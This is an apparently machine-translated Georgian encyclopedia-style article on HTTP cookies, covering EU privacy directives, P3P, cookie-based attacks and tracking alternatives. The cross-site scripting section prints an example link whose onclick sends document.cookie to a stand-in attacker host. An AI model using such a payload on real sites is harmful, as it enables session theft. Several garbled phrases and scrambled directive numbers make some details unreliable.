2003 წლის ოქტომბრიდან განხორციელებული დირექტივის პრაქტიკაში მხოლოდ არასრულყოფილად იქნა გამოყენებული 2004 წლის დეკემბრის ანგარიშის მიხედვით, რომელიც ასევე აღნიშნავდა, რომ ზოგიერთ წევრ სახელმწიფოს (სლოვაკია, ლატვია, საბერძნეთი, ბელგია და ლუქსემბურგი) ჯერ არ ჰქონდათ გადატანილი დირექტივა შიდა კანონმდებლობაში.

G29-ის 2010 წლის მოსაზრების თანახმად, ეს დირექტივა, რომელიც განსაკუთრებით განაპირობებს ქუქიების გამოყენებას ქცევითი სარეკლამო მიზნებისთვის, ინტერნეტ მომხმარებლის აშკარა თანხმობით, კვლავ ძალიან ცუდად გამოიყენება. ფაქტობრივად, საიტების უმეტესობა ამას აკეთებს ისე, რომ არ შეესაბამება დირექტივას, შემოიფარგლება უბრალო "ბანერით", რომელიც აწვდის ინფორმაციას "ქუქიების" გამოყენების შესახებ გამოყენების შესახებ ინფორმაციის მიწოდების გარეშე, "ტექნიკური" ქუქი-ფაილების განსხვავების გარეშე. ქუქიების „თვალთვალის“ და არც რეალური არჩევანის შეთავაზება მომხმარებლისთვის, რომელსაც სურს შეინახოს ტექნიკური ქუქიები (როგორიცაა საყიდლების კალათის მართვის ქუქიები) და უარი თქვას ქუქი-ფაილების „თვალთვალზე“. ფაქტობრივად, ბევრი საიტი არ ფუნქციონირებს სწორად, თუ ქუქი-ფაილებს უარს ეუბნებიან, რაც არ შეესაბამება დირექტივას 2002/58 ან 95/46 დირექტივას (პერსონალური მონაცემების დაცვა).

დირექტივა 2009/136 / CE

ეს მასალა განახლებულია 2009 წლის 136 ნოემბრის 25/2009/EC დირექტივით, რომელშიც ნათქვამია, რომ „აბონენტის ან მომხმარებლის ტერმინალურ აღჭურვილობაში ინფორმაციის შენახვა ან უკვე შენახულ ინფორმაციაზე წვდომის მიღება დასაშვებია მხოლოდ იმ პირობით, რომ აბონენტმა ან მომხმარებელმა გასცა თანხმობა მას შემდეგ, რაც მიიღო, 95/46/EC დირექტივის შესაბამისად, მკაფიო და სრული ინფორმაცია სხვებს შორის დამუშავების მიზნების შესახებ“. ამიტომ ახალი დირექტივა აძლიერებს ვალდებულებებს ინტერნეტ მომხმარებლის კომპიუტერში ქუქიების განთავსებამდე.

თუმცა, ევროპული კანონმდებელი დირექტივის წინასწარ განხილვებში აკონკრეტებს: „სადაც ტექნიკურად შესაძლებელია და ეფექტურია, 95/46/EC დირექტივის შესაბამისი დებულებების შესაბამისად, მომხმარებლის თანხმობა დამუშავებასთან დაკავშირებით შეიძლება გამოხატული იყოს ბრაუზერის ან სხვა აპლიკაციის შესაბამისი პარამეტრების გამოყენება“. მაგრამ სინამდვილეში, არცერთი ბრაუზერი არ იძლევა შესაძლებლობას განასხვავოს ძირითადი ტექნიკური ქუქიები არასავალდებულოდან, რომელიც მომხმარებლის არჩევანზე უნდა დარჩეს.

ეს ახალი დირექტივა ბელგიელმა დეპუტატებმა გადაიტანეს 2012 წლის ივლისში. 2014 წლის კვლევა აჩვენებს, რომ დეპუტატებსაც კი უჭირთ განაცხადის გაკეთება. დირექტივის შეზღუდვები.

P3P

P3P სპეციფიკაცია მოიცავს სერვერის შესაძლებლობას განაცხადოს კონფიდენციალურობის პოლიტიკა, რომელიც განსაზღვრავს რა სახის ინფორმაციას აგროვებს და რა მიზნით. ეს პოლიტიკა მოიცავს (მაგრამ არ შემოიფარგლება მხოლოდ) ქუქიების გამოყენებით შეგროვებული ინფორმაციის გამოყენებას. P3P-ის განმარტებების მიხედვით, ბრაუზერს შეუძლია მიიღოს ან უარყოს ქუქი ფაილები კონფიდენციალურობის პოლიტიკის მომხმარებლის პრეფერენციებთან შედარებით ან მომხმარებლის კითხვით, სერვერის მიერ გამოცხადებული კონფიდენციალურობის პოლიტიკის კონფიდენციალურობის განცხადების წარდგენით.

ბევრი ბრაუზერი, მათ შორის Apple Safari და Microsoft Internet Explorer ვერსიები 6 და 7, მხარს უჭერს P3P-ს, რომელიც საშუალებას აძლევს ბრაუზერს განსაზღვროს, მიიღოს თუ არა მესამე მხარის ქუქიების შენახვა. Opera ბრაუზერი მომხმარებლებს საშუალებას აძლევს უარი თქვან მესამე მხარის ქუქი-ფაილებებზე და შექმნან გლობალური და სპეციფიკური უსაფრთხოების პროფილი ინტერნეტ დომენებისთვის. Mozilla Firefox-ის 2 ვერსიამ გააუქმა P3P მხარდაჭერა, მაგრამ აღადგინა ის მე-3 ვერსიაში.

მესამე მხარის ქუქიების დაბლოკვა შესაძლებელია ბრაუზერების უმეტესობის მიერ, რათა გაზარდოს კონფიდენციალურობა და შეამციროს რეკლამების თვალყურის დევნება, მომხმარებლის ვებ გამოცდილებაზე უარყოფითი ზემოქმედების გარეშე. ბევრი სარეკლამო სააგენტო გთავაზობთ ვარიანტს უარის თქმა მიზანმიმართული რეკლამისთვის, ბრაუზერში ზოგადი ქუქი-ფაილის დაყენებით, რომელიც ააქტიურებს ამ მიზნობრიობას, მაგრამ ასეთი გამოსავალი პრაქტიკულად არ არის ეფექტური, როდესაც მას პატივს სცემენ, რადგან ეს ზოგადი ქუქი-ფაილი წაიშლება როგორც კი მომხმარებელი წაშლის ამ ქუქი-ფაილებს, რაც აუქმებს არჩევანს. გამოტანილი გადაწყვეტილება.

ქუქიების ნაკლოვანებები

კონფიდენციალურობის საკითხების გარდა, ქუქი-ფაილებს ასევე აქვთ ტექნიკური ხარვეზები. კერძოდ, ისინი ყოველთვის ზუსტად არ ახდენენ მომხმარებლების იდენტიფიცირებას, მათ შეუძლიათ შეანელონ საიტის მუშაობა დიდი რაოდენობით, მათი გამოყენება უსაფრთხოების შეტევებისთვის და ისინი ეწინააღმდეგება წარმომადგენლობითი სახელმწიფოს გადაცემას, პროგრამული უზრუნველყოფის არქიტექტურულ სტილს.

არაზუსტი იდენტიფიკაცია

თუ კომპიუტერზე ერთზე მეტი ბრაუზერი გამოიყენება, თითოეულ მათგანში ყოველთვის არის ცალკე საცავის განყოფილება ქუქი-ფაილისთვის. ამრიგად, ქუქი-ფაილები არ ახდენენ პიროვნების იდენტიფიკაციას, არამედ მომხმარებლის ანგარიშის, კომპიუტერისა და ვებ ბრაუზერის კომბინაციას. ამრიგად, ნებისმიერს შეუძლია გამოიყენოს ეს ანგარიშები, კომპიუტერები ან ბრაუზერები, რომლებსაც აქვთ ქუქი-ფაილების პანოპლია. ანალოგიურად, ქუქიები არ განასხვავებენ მრავალ მომხმარებელს, რომლებიც იზიარებენ ერთსა და იმავე მომხმარებლის ანგარიშს, კომპიუტერს და ბრაუზერს, მაგალითად, „ინტერნეტ კაფეებში“ ან ნებისმიერ ადგილას, სადაც უფასო წვდომა აქვს კომპიუტერულ რესურსებზე.

მაგრამ პრაქტიკაში ეს განცხადება უმეტეს შემთხვევაში მცდარი აღმოჩნდება, რადგან დღეს "პერსონალური" კომპიუტერი (ან სმარტფონი, ან ტაბლეტი, რაც უარესია) ძირითადად გამოიყენება ერთი ინდივიდის მიერ. შეგროვებული ინფორმაციის მოცულობის მეშვეობით მიაღწიეთ პერსონალიზებულ მიზნობრივ მიზანს, მაშინაც კი, თუ პირი არ არის „სახელად“ იდენტიფიცირებული.

ქუქიების ქურდობა

Cookie შეიძლება მოიპაროს სხვა კომპიუტერმა ქსელში.

ნორმალური მუშაობის დროს ქუქი-ფაილები იგზავნება სერვერს (ან სერვერების ჯგუფს იმავე დომენში) და მომხმარებლის კომპიუტერის ბრაუზერს შორის. ვინაიდან ქუქიები შეიძლება შეიცავდეს სენსიტიურ ინფორმაციას (მომხმარებლის სახელი, პაროლი, რომელიც გამოიყენება ავტორიზაციისთვის და ა.შ.), მათი მნიშვნელობები არ უნდა იყოს ხელმისაწვდომი სხვა კომპიუტერებისთვის. ქუქი-ფაილების ქურდობა არის არაავტორიზებული მესამე მხარის მიერ ქუქი-ფაილების ხელყოფის აქტი.

ქუქი-ფაილების მოპარვა შესაძლებელია პაკეტის სნიფერის მეშვეობით შეტევის დროს, რომელსაც ეწოდება სესიის გატაცება. ქსელში ტრაფიკი შეიძლება ჩაითვალოს და წაიკითხოს სხვა კომპიუტერები, გარდა გაგზავნისა და მიღებისა (განსაკუთრებით დაშიფრული საჯარო Wi-Fi სივრცეში). ეს ტრაფიკი მოიცავს ქუქი-ფაილებს, რომლებიც გაგზავნილია სესიებზე მარტივი HTTP პროტოკოლის გამოყენებით. როდესაც ქსელის ტრაფიკი არ არის დაშიფრული, მავნე მომხმარებლებს შეუძლიათ წაიკითხონ სხვა მომხმარებლების კომუნიკაციები ქსელში "პაკეტების სნიფერის" გამოყენებით.

ამ პრობლემის დაძლევა შესაძლებელია მომხმარებლის კომპიუტერსა და სერვერს შორის კავშირის დაშიფვრით HTTPS პროტოკოლის გამოყენებით. სერვერს შეუძლია მიუთითოს ა უსაფრთხო დროშა ქუქი-ფაილის დაყენებისას; ბრაუზერი მას მხოლოდ დაცულ ხაზზე გაგზავნის, როგორიცაა SSL კავშირი.

თუმცა ბევრი საიტი, მიუხედავად იმისა, რომ იყენებს HTTPS დაშიფრულ კომუნიკაციას მომხმარებლის ავთენტიფიკაციისთვის (ანუ შესვლის გვერდი), მოგვიანებით აგზავნის სესიის ქუქი-ფაილებს და სხვა მონაცემებს, როგორც ჩვეულებრივ, დაუშიფრავი HTTP კავშირების მეშვეობით ეფექტურობის მიზეზების გამო. ამგვარად, თავდამსხმელებს შეუძლიათ სხვა მომხმარებლების ქუქი-ფაილების დაჭერა და მათი პირადობის მოპოვება შესაბამის საიტებზე ან მათი გამოყენება ქუქიების შეტევებში.

სკრიპტირება საიტზე: ქუქი-ფაილი, რომელიც მხოლოდ სერვერსა და კლიენტს შორის უნდა გაცვალოთ, იგზავნება სხვა მესამე მხარეს.

ქუქიების მოპარვის კიდევ ერთი გზაა საიტების სკრიპტირება და თავად ბრაუზერმა ქუქიების გაგზავნა მავნე სერვერებზე, რომლებიც არასოდეს მიიღებენ მათ. თანამედროვე ბრაუზერები იძლევა სერვერიდან კოდის მოთხოვნადი ნაწილების შესრულების საშუალებას. თუ ქუქი-ფაილებს წვდომა აქვთ გაშვების დროს, მათი მნიშვნელობები შეიძლება გარკვეული ფორმით გადაეცეს სერვერებს, რომლებსაც არ უნდა ჰქონდეთ მათზე წვდომა. ქუქი-ფაილების დაშიფვრა ქსელში გაგზავნამდე არ უწყობს ხელს შეტევის ჩაშლას.

ამ ტიპის შიდა სკრიპტირება ჩვეულებრივ გამოიყენება თავდამსხმელების მიერ საიტებზე, რომლებიც მომხმარებლებს საშუალებას აძლევს განათავსონ HTML შინაარსი. თავსებადი კოდის ნაწილის HTML წვლილის ინტეგრირებით, თავდამსხმელს შეუძლია მიიღოს ქუქიები სხვა მომხმარებლებისგან. ამ ქუქიების შესახებ ცოდნა შეიძლება გამოყენებულ იქნას იმავე საიტთან დაკავშირებით მოპარული ქუქიების გამოყენებით, რითაც აღიარებული იქნებით როგორც მომხმარებელი, რომლის ქუქიები მოიპარეს.

ასეთი თავდასხმების თავიდან აცილების ერთ-ერთი გზაა HttpOnly დროშის გამოყენება; ეს არის ვარიანტი, რომელიც დაინერგა Internet Explorer-ის მე-6 ვერსიიდან PHP-ში 5.2.0 ვერსიიდან, რომელიც დაგეგმილია ქუქი-ფაილისთვის მიუწვდომელი გახდეს კლიენტისთვის სკრიპტთან ახლოს. თუმცა, ვებ დეველოპერებმა უნდა გაითვალისწინონ ეს თავიანთი საიტის შემუშავებისას, რათა მათ დაიცვან იმუნიტეტი საიტზე სკრიპტირების მიმართ.

უსაფრთხოების კიდევ ერთი საფრთხე გამოიყენება საიტზე მოთხოვნის გაყალბება.

ოფიციალური ტექნიკური სპეციფიკაცია საშუალებას იძლევა ქუქიების გაგზავნა მხოლოდ იმ დომენის სერვერებზე, საიდანაც ისინი წარმოიშვა. თუმცა, ქუქიების მნიშვნელობა შეიძლება გაიგზავნოს სხვა სერვერებზე ქუქიების სათაურების გარდა სხვა საშუალებების გამოყენებით.

კერძოდ, სკრიპტირების ენებს, როგორიცაა JavaScript, ზოგადად აქვთ წვდომა ქუქიების მნიშვნელობებზე და შეუძლიათ თვითნებური მნიშვნელობების გაგზავნა ნებისმიერ სერვერზე ინტერნეტში. ეს სკრიპტირების შესაძლებლობა გამოიყენება ვებსაიტებიდან, რომლებიც მომხმარებლებს საშუალებას აძლევს გამოაქვეყნონ HTML შინაარსი სხვა მომხმარებლების სანახავად.

მაგალითად, თავდამსხმელმა, რომელიც მოქმედებს example.com დომენზე, შეიძლება გამოაქვეყნოს კომენტარი, რომელიც შეიცავს შემდეგ ბმულს, რომელიც მიუთითებს პოპულარულ ბლოგზე, რომელსაც ისინი სხვაგვარად არ აკონტროლებენ:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

როდესაც სხვა მომხმარებელი დააწკაპუნებს ამ ბმულზე, ბრაუზერი ახორციელებს კოდის onclick ატრიბუტის ნაწილს, ასე რომ, ის ცვლის document.cookie სტრიქონს მომხმარებლის ქუქიების სიით, რომლებიც აქტიურია ამ გვერდისთვის. ამიტომ, ქუქიების ეს სია იგზავნება example.com სერვერზე და, შესაბამისად, თავდამსხმელს შეუძლია ამ მომხმარებლის ქუქიების შეგროვება.

ამ ტიპის თავდასხმა რთულია მომხმარებლის მხრიდან, რადგან სკრიპტი მოდის იმავე დომენიდან, სადაც მითითებულია ქუქი-ფაილები, ხოლო მნიშვნელობების გაგზავნის ოპერაცია, როგორც ჩანს, ავტორიზებულია ამ დომენის მიერ. მიჩნეულია, რომ ამ ტიპის საიტის მოქმედი ადმინისტრატორების პასუხისმგებლობაა მავნე კოდის გამოქვეყნების თავიდან აცილების შეზღუდვების დაწესება.

ქუქიები პირდაპირ არ ჩანს კლიენტის მხარის პროგრამებისთვის, როგორიცაა JavaScript, თუ ისინი გაიგზავნა HttpOnly დროშით. სერვერის თვალსაზრისით, ერთადერთი განსხვავება ისაა, რომ Set-Cookie სათაურის ხაზში დამატებულია ახალი ველი, რომელიც შეიცავს სტრიქონს HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

როდესაც ბრაუზერი იღებს ასეთ ქუქი-ფაილს, ის ჩვეულებრივ გამოიყენებს მას შემდეგ HTTP გაცვლაში, მაგრამ კლიენტის მხარეს შესრულებული სკრიპტებისთვის ხილვის გარეშე. HttpOnly დროშა არ არის რაიმე ოფიციალური ტექნიკური სპეციფიკაციის ნაწილი და არ არის დანერგილი ყველა ბრაუზერში. გაითვალისწინეთ, რომ ამჟამად არ არსებობს გზა სესიის ქუქიების წაკითხვისა და ჩაწერის თავიდან ასაცილებლად XMLHTTPRequest მეთოდით.

შინაარსის მოდიფიკაცია: თავდამსხმელი სერვერზე აგზავნის არასწორი ქუქი-ჩანაწერს, რომელიც შესაძლოა შექმნილი იყოს სერვერის მიერ გაგზავნილი სწორი ქუქიიდან.

ქუქიების შეცვლა

როგორც კი ქუქი-ფაილების შენახვა და სერვერზე უცვლელი დაბრუნება დასჭირდება, თავდამსხმელს შეუძლია შეცვალოს ქუქიების მნიშვნელობა, სანამ ისინი ისევ სერვერზე გაიგზავნება. მაგალითად, თუ ქუქი-ფაილი შეიცავს მთლიან ღირებულებას, რომელიც მომხმარებელმა უნდა გადაიხადოს მაღაზიის კალათაში მოთავსებული ნივთებისთვის, ამ მნიშვნელობის შეცვლა სერვერს უქმნის თავდამსხმელზე საწყისი ფასის დარიცხვის რისკს. ქუქიების მნიშვნელობის შეცვლის პროცესს ე.წ ფუნთუშების მოწამვლა და შეიძლება გამოყენებულ იქნას ქუქიების მოპარვის შემდეგ, რათა შეტევა მდგრადი იყოს.

ქუქიების გადაფარვის მეთოდში, თავდამსხმელი იყენებს ბრაუზერის შეფერხებას სერვერზე არასწორი ქუქი-ჩანაწერის გაგზავნისთვის.

თუმცა, ვებსაიტების უმეტესობა ინახავს მხოლოდ სესიის ID-ს - შემთხვევით გენერირებულ უნიკალურ ნომერს, რომელიც გამოიყენება სესიის მომხმარებლის იდენტიფიცირებისთვის - თავად ქუქი-ფაილში, ხოლო ყველა სხვა ინფორმაცია ინახება სერვერზე. ამ შემთხვევაში, ეს პრობლემა დიდწილად მოგვარებულია.

ქუქიების დამუშავება საიტებს შორის

მოსალოდნელია, რომ თითოეულ საიტს ჰქონდეს საკუთარი ქუქიები, ამიტომ ერთ საიტს არ უნდა შეეძლოს სხვა საიტთან დაკავშირებული ქუქიების შეცვლა ან შექმნა. ვებ ბრაუზერის უსაფრთხოების ხარვეზს შეუძლია მავნე საიტებს დაარღვიოს ეს წესი. ასეთი ხარვეზის გამოყენებას ჩვეულებრივ უწოდებენ ჯვარედინი სამზარეულო. ასეთი თავდასხმების მიზანი შეიძლება იყოს სესიის პირადობის მოპარვა.

მომხმარებლებმა უნდა გამოიყენონ ვებ ბრაუზერების უახლესი ვერსიები, რომლებშიც ეს დაუცველობა პრაქტიკულად აღმოფხვრილია.

კონფლიქტური მდგომარეობა კლიენტსა და სერვერს შორის

ქუქიების გამოყენებამ შეიძლება გამოიწვიოს წინააღმდეგობა კლიენტის მდგომარეობასა და ქუქიში შენახულ მდგომარეობას შორის. თუ მომხმარებელი იძენს ქუქი-ფაილს და დააწკაპუნებს ბრაუზერის "უკან" ღილაკზე, ბრაუზერის მდგომარეობა, როგორც წესი, არ არის იგივე, რაც ამ შეძენამდე. მაგალითად, თუ ონლაინ მაღაზიის კალათა იქმნება ქუქიების გამოყენებით, კალათის შიგთავსი ვერ შეიცვლება, როდესაც მომხმარებელი ბრაუზერის ისტორიას უბრუნდება: თუ მომხმარებელი დააჭერს ღილაკს კალათაში სტატიის დასამატებლად და დააჭერს ღილაკს "დაბრუნება". "ღილაკზე, სტატია რჩება ამ ერთში. ეს შეიძლება არ იყოს მომხმარებლის განზრახვა, რომელსაც, რა თქმა უნდა, სურს სტატიის დამატების გაუქმება. ამან შეიძლება გამოიწვიოს არასანდოობა, დაბნეულობა და შეცდომები. ასე რომ, ვებ დეველოპერებმა უნდა იცოდნენ ეს პრობლემა და განახორციელონ ზომები მსგავსი სიტუაციების მოსაგვარებლად.

ქუქი-ფაილის ვადის გასვლა

მუდმივი ქუქი-ფაილები გააკრიტიკეს კონფიდენციალურობის უსაფრთხოების ექსპერტებმა იმის გამო, რომ ვადა არ იწურება საკმარისად მალე, რაც საშუალებას აძლევს ვებგვერდებს თვალყური ადევნონ მომხმარებლებს და შექმნან მათი პროფილი დროთა განმავლობაში. ქუქიების ეს ასპექტი ასევე არის სესიის გატაცების პრობლემის ნაწილი, რადგან მოპარული მუდმივი ქუქი-ფაილები შეიძლება გამოყენებულ იქნეს მომხმარებლის როლის შესრულებისთვის დიდი ხნის განმავლობაში.

მოხმარებლის ასევე: GAFAM: ვინ არიან ისინი? რატომ არიან ისინი (ზოგჯერ) ასეთი საშინელი?

ქუქიების ალტერნატივები

ზოგიერთი ოპერაცია, რომელიც შეიძლება შესრულდეს ქუქიების გამოყენებით, ასევე შეიძლება შესრულდეს სხვა მექანიზმების გამოყენებით, რომლებიც გვერდს უვლიან ქუქი-ფაილებს ან ხელახლა ქმნიან წაშლილ ქუქიებს, რაც ქმნის კონფიდენციალურობის პრობლემებს იმავე გზით (ან ზოგჯერ უარესად, რადგან უხილავია), ვიდრე ქუქიები.

IP მისამართი

მომხმარებლების თვალყურის დევნება შესაძლებელია კომპიუტერის IP მისამართით, რომელიც რეკავს გვერდზე. ეს ტექნიკა ხელმისაწვდომია მსოფლიო ქსელის დანერგვის დღიდან, რადგან გვერდები ჩამოიტვირთება, სერვერი ითხოვს ბრაუზერის ან პროქსის მქონე კომპიუტერის IP მისამართს, თუ არცერთი არ არის გამოყენებული. სერვერს შეუძლია თვალყური ადევნოს ამ ინფორმაციას, არის თუ არა გამოყენებული ქუქიები. თუმცა, ეს მისამართები, როგორც წესი, ნაკლებად სანდოა მომხმარებლის იდენტიფიკაციისას, ვიდრე ქუქი ფაილები, რადგან კომპიუტერები და პროქსი შეიძლება იყოს გაზიარებული რამდენიმე მომხმარებლის მიერ და ერთმა კომპიუტერმა შეიძლება მიიღოს განსხვავებული IP მისამართი თითოეულ სამუშაო სესიაზე (როგორიცაა c ხშირად სატელეფონო კავშირების შემთხვევაში). .

IP მისამართებით თვალყურის დევნება შეიძლება იყოს საიმედო ზოგიერთ სიტუაციაში, როგორიცაა ფართოზოლოვანი კავშირები, რომლებიც ინარჩუნებენ იგივე IP მისამართს დიდი ხნის განმავლობაში, სანამ დენი ჩართულია.

ზოგიერთი სისტემა, როგორიცაა Tor, შექმნილია იმისთვის, რომ შეინარჩუნოს ინტერნეტის ანონიმურობა და IP მისამართით თვალყურის დევნება შეუძლებელი ან არაპრაქტიკული გახადოს.

URL

უფრო ზუსტი ტექნიკა ეფუძნება URL-ებში ინფორმაციის ჩასმას. URL-ის შეკითხვის სტრიქონის ნაწილი არის ერთ-ერთი ტექნიკა, რომელიც ჩვეულებრივ გამოიყენება ამ მიზნით, მაგრამ სხვა ნაწილების გამოყენებაც შესაძლებელია. როგორც Java serverlet, ასევე PHP სესიის მექანიზმები იყენებენ ამ მეთოდს, თუ ქუქიები არ არის ჩართული.

ეს მეთოდი გულისხმობს ვებ სერვერის მიერ სტრიქონების მოთხოვნის დამატებას ვებ გვერდის ბმულებზე, რომლებიც მას ატარებენ ბრაუზერში გაგზავნისას. როდესაც მომხმარებელი მიჰყვება ბმულს, ბრაუზერი აბრუნებს სერვერზე მიმაგრებულ შეკითხვის სტრიქონს.

ამ მიზნით გამოყენებული შეკითხვის სტრიქონები და ქუქი-ფაილები ძალიან ჰგავს, ორივე არის სერვერის მიერ თვითნებურად არჩეული და ბრაუზერის მიერ დაბრუნებული ინფორმაცია. თუმცა, არის გარკვეული განსხვავებები: როდესაც URL-ის შემცველი შეკითხვის სტრიქონი ხელახლა გამოიყენება, იგივე ინფორმაცია იგზავნება სერვერზე. მაგალითად, თუ მომხმარებლის პრეფერენციები დაშიფრულია URL-ის შეკითხვის სტრიქონში და მომხმარებელი ამ URL-ს სხვა მომხმარებელს ელფოსტით აგზავნის, ის ასევე შეძლებს ამ პარამეტრების გამოყენებას.

მეორეს მხრივ, როდესაც მომხმარებელი ორჯერ წვდება ერთსა და იმავე გვერდზე, არ არსებობს გარანტია, რომ იგივე შეკითხვის სტრიქონი ორივეჯერ იქნება გამოყენებული. მაგალითად, თუ მომხმარებელი პირველად მოხვდება საიტის შიდა გვერდის გვერდზე და მეორედ ხვდება იმავე გვერდზე გარე გვერდიდან, საიტის გვერდის მიმართ შეკითხვის სტრიქონი ჩვეულებრივ განსხვავებულია, ხოლო ქუქიები იგივეა. .

შეკითხვის სტრიქონების სხვა უარყოფითი მხარეები დაკავშირებულია უსაფრთხოებასთან: მონაცემთა შენახვა, რომელიც სესიას იდენტიფიცირებს მოთხოვნის სტრიქონებში, საშუალებას აძლევს ან ამარტივებს სესიის ფიქსაციის შეტევებს, იდენტიფიკატორის მითითების შეტევებს და სხვა ექსპლოიტებს. სესიის ID-ების HTTP ქუქიების სახით გადაცემა უფრო უსაფრთხოა.

დამალული ფორმის ველი

სესიის თვალთვალის ერთ-ერთი ფორმა, რომელსაც იყენებს ASP.NET, არის ვებ ფორმების გამოყენება ფარული ველებით. ეს ტექნიკა ძალიან ჰგავს URL შეკითხვის სტრიქონების გამოყენებას ინფორმაციის გადასატანად და აქვს იგივე უპირატესობები და უარყოფითი მხარეები; და თუ ფორმა დამუშავდება HTTP GET მეთოდით, ველები რეალურად ხდება ბრაუზერის URL-ის ნაწილი, რომელიც გამოგიგზავნით მას ფორმის გაგზავნისას. მაგრამ ფორმების უმეტესობა მუშავდება HTTP POST-ით, რაც იწვევს ფორმის ინფორმაციის, მათ შორის ფარული ველების, დამატებას, როგორც დამატებითი შეყვანის სახით, რომელიც არც URL-ის ნაწილია და არც ქუქი.

ამ მიდგომას აქვს ორი უპირატესობა თვალთვალის პერსპექტივიდან: პირველი, HTML-ის წყაროს კოდში და POST-ში შეყვანილი ინფორმაციის თვალყურის დევნება საშუალებას მისცემს საშუალო მომხმარებელს თავიდან აიცილოს ეს თვალთვალი; მეორე, სესიის ინფორმაცია არ კოპირდება, როდესაც მომხმარებელი აკოპირებს URL-ს (გვერდის დისკზე შესანახად ან ელექტრონული ფოსტით გაგზავნისთვის, მაგალითად).

ფანჯარა.სახელი

ყველა გავრცელებულ ვებ-ბრაუზერს შეუძლია შეინახოს საკმაოდ დიდი რაოდენობით მონაცემები (2 მბ-დან 32 მბ-მდე) JavaScript-ის საშუალებით DOM-ის window.name თვისების გამოყენებით. ეს მონაცემები შეიძლება გამოყენებულ იქნას სესიის ქუქიების ნაცვლად და ასევე გამოიყენება დომენებში. ტექნიკა შეიძლება შეუერთდეს JSON ობიექტებს კლიენტის მხარის სესიის ცვლადების რთული ნაკრების შესანახად.

მინუსი არის ის, რომ თითოეულ ცალკეულ ფანჯარას ან ჩანართს თავდაპირველად ექნება ცარიელი window.name; ჩანართების მიხედვით დათვალიერებისას (გახსნილია მომხმარებლის მიერ) ეს ნიშნავს, რომ ინდივიდუალურად გახსნილ ჩანართებს არ ექნებათ ფანჯრის სახელი. გარდა ამისა, window.name შეიძლება გამოყენებულ იქნას ვიზიტორების თვალყურის დევნებისთვის სხვადასხვა საიტებზე, რამაც შეიძლება გამოიწვიოს კონფიდენციალურობის პრობლემა.

ზოგიერთ ასპექტში ეს შეიძლება იყოს უფრო უსაფრთხო ვიდრე ქუქიები, სერვერის არ ჩართვის გამო, რითაც ის დაუცველი გახდება სნაიფერ ქუქიების ქსელის შეტევისგან. თუმცა, თუ სპეციალური ზომები იქნა მიღებული მონაცემების დასაცავად, ის დაუცველია შემდგომი შეტევებისთვის, რადგან მონაცემები ხელმისაწვდომია იმავე ფანჯარაში გახსნილი სხვა საიტებიდან.

HTTP ავტორიზაცია

HTTP პროტოკოლი მოიცავს წვდომის ავთენტიფიკაციის ძირითად პროტოკოლებს და წვდომის ავთენტიფიკაციის დაიჯესტს, რომელიც საშუალებას აძლევს ვებ გვერდზე წვდომას მხოლოდ მაშინ, როდესაც მომხმარებელმა დაასახელა მომხმარებლის სახელი და პაროლი. okay pass. თუ სერვერი ითხოვს სერთიფიკატს ვებ გვერდზე წვდომის მინიჭებისთვის, ბრაუზერი ითხოვს მას მომხმარებლისგან და მიღების შემდეგ, ბრაუზერი ინახავს მას და აგზავნის მას ყველა შემდგომ HTTP მოთხოვნაში. ეს ინფორმაცია შეიძლება გამოყენებულ იქნას მომხმარებლის თვალყურის დევნებისთვის.

ადგილობრივი საერთო ობიექტი

თუ ბრაუზერი შეიცავს Adobe Flash Player დანამატს, ადგილობრივი საერთო ობიექტები შეიძლება გამოყენებულ იქნას იმავე მიზნით, როგორც ქუქიები. ისინი შეიძლება იყოს მიმზიდველი არჩევანი ვებ დეველოპერებისთვის, რადგან:

• ნაგულისხმევი ზომის ლიმიტი ლოკალური გაზიარებული ობიექტისთვის არის 100 KB;
• უსაფრთხოების შემოწმებები განცალკევებულია მომხმარებლის ქუქიების შემოწმებისგან (ასე რომ, ადგილობრივი გაზიარებული ობიექტები შეიძლება დაშვებული იყოს, როდესაც ქუქიები არ არის).

ეს ბოლო პუნქტი, რომელიც განასხვავებს ქუქიების მართვის პოლიტიკას Adobe-ის ლოკალური გაზიარებული ობიექტებისგან აჩენს კითხვებს მომხმარებლის მიერ მისი კონფიდენციალურობის პარამეტრების მართვასთან დაკავშირებით: მან უნდა იცოდეს, რომ ქუქიების მართვა არ ახდენს გავლენას ლოკალური საერთო ობიექტების მართვაზე და პირიქით.

ამ სისტემის კიდევ ერთი კრიტიკა არის ის, რომ მისი გამოყენება შესაძლებელია მხოლოდ Adobe Flash Player მოდულის საშუალებით, რომელიც არის საკუთრება და არა ვებ სტანდარტი.

კლიენტის მხრიდან გამძლეობა

ზოგიერთი ვებ ბრაუზერი მხარს უჭერს სკრიპტზე დაფუძნებულ მდგრადობის მექანიზმს, რომელიც საშუალებას აძლევს გვერდს შეინახოს ინფორმაცია ადგილობრივად შემდგომი გამოყენებისთვის. Internet Explorer, მაგალითად, მხარს უჭერს მუდმივ ინფორმაციას ბრაუზერის ისტორიაში, სანიშნეებში, XML-ში შენახულ ფორმატში ან პირდაპირ დისკზე შენახულ ვებ გვერდზე. Microsoft Internet Explorer 5-ისთვის არსებობს მომხმარებლის მონაცემების მეთოდი, რომელიც ხელმისაწვდომია DHTML ქცევის საშუალებით.

W3C-მა HTML 5-ში შემოიტანა ახალი JavaScript API კლიენტის მხარეს მონაცემთა შესანახად, სახელწოდებით ვებ საცავი და მიზნად ისახავდა ქუქიების სამუდამოდ ჩანაცვლებას. ის მსგავსია ქუქიების, მაგრამ მნიშვნელოვნად გაუმჯობესებული ტევადობით და ინფორმაციის შენახვის გარეშე HTTP მოთხოვნის სათაურში. API საშუალებას იძლევა ორი ტიპის ვებ-საცავი: ლოკალური და სესიის საცავი, მუდმივი ქუქიების და სესიის ქუქიების მსგავსი (გარდა იმისა, რომ სესიის ქუქიების ვადა იწურება, როდესაც ბრაუზერი დახურულია სესიის საცავი იწურება, როდესაც ჩანართი დაიხურება), შესაბამისად. ვებ საცავი მხარდაჭერილია Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 და Opera 10.50.

სხვა მექანიზმი ჩვეულებრივ ეყრდნობა ბრაუზერის ქეშირებას (მეხსიერებაში და არა განახლებას) JavaScript პროგრამების გამოყენებით ვებ გვერდებზე. 

მაგალითად, გვერდი შეიძლება შეიცავდეს ტეგს . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

